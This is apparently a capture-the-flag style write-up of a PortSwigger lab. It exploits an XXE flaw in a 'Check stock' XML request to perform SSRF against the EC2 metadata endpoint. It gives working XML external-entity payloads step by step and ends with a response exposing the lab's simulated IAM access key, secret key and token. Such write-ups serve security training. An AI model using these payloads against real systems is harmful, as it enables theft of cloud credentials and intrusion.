This lab has a "Check stock" feature that parses XML input and returns any unexpected values in the response.

The lab server is running a (simulated) EC2 metadata endpoint at the default URL, which is `http://169.254.169.254/`. This endpoint can be used to retrieve data about the instance, some of which might be sensitive.

To solve the lab, exploit the [XXE](https://portswigger.net/web-security/xxe) vulnerability to perform an [SSRF attack](https://portswigger.net/web-security/ssrf) that obtains the server's IAM secret access key from the EC2 metadata endpoint.

# Practical
Again, let's just browse the web like a normal user would do to see all the functionalities, looks like we're dealing with the Check stock function again.
Let's view the request being sent.
```http
POST https://ac6f1fe61fab376a80d3050c00fb0035.web-security-academy.net/product/stock HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: https://ac6f1fe61fab376a80d3050c00fb0035.web-security-academy.net/product?productId=1
Content-Type: application/xml
Origin: https://ac6f1fe61fab376a80d3050c00fb0035.web-security-academy.net
Content-Length: 184
DNT: 1
Connection: keep-alive
Cookie: session=R43cc0rniFIZs3LrMhdSPvrX2f16iwCN
Host: ac6f1fe61fab376a80d3050c00fb0035.web-security-academy.net

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
	<productId>1</productId>
	<storeId>3</storeId>
</stockCheck>
```
Again it's sending XML. This time we need to perform a SSRF attack with it.
First let's verify our XML payload is working and then you can finally change it to SSRF
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'http://169.254.169.254/'>]>
<stockCheck>
	<productId>&test;</productId>
	<storeId>3</storeId>
</stockCheck>
```
We get this response
```txt
"Invalid product ID: latest"
```
And if we append latest to our URL
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'http://169.254.169.254/latest'>]>
<stockCheck>
	<productId>&test;</productId>
	<storeId>3</storeId>
</stockCheck>
```
We get this
```txt
"Invalid product ID: meta-data"
```
So we're getting a directory. Let's do this.
Keep appending it to our URL until we finally get this
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY test SYSTEM 'http://169.254.169.254/latest/meta-data/iam/security-credentials/admin'>]>
<stockCheck>
	<productId>&test;</productId>
	<storeId>3</storeId>
</stockCheck>
```
And our response should be
```http
HTTP/1.1 400 Bad Request
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 546

"Invalid product ID: {
  "Code" : "Success",
  "LastUpdated" : "2021-08-02T13:54:05.438452Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "7MM7GYauU3bBwTcBmutE",
  "SecretAccessKey" : "iV0QTXkTcKbsxvJJBvk17jSm7WXyjWxOecggIKbp",
  "Token" : "rhX4OmPc8k3yKjLaEHPpC148k0xH51zizRXf5k5jOTO4Ms2iknK3fXJtSjPZ13WOxkWdUyOuIsi3YkecaFoJIZRdqR1pNGHQIW1sMhkMh5Tq6UtGgkSGhpwiTYhfpTST1sobKe9BRGyEZOFudv7pe8Hy2YXyzmvDnN65N7GXJCcCFT3PFPmHM5viAv6Tjn1DqUnpGqvLh9AqnxvVTOrdjG6T5Rtv2y1sYMhmh3t0TqrI3ANZtPrzwjZimZuIqlTp",
  "Expiration" : "2027-08-01T13:54:05.438452Z"
}"

```
Now send in the SecretAccessKey and solve the lab.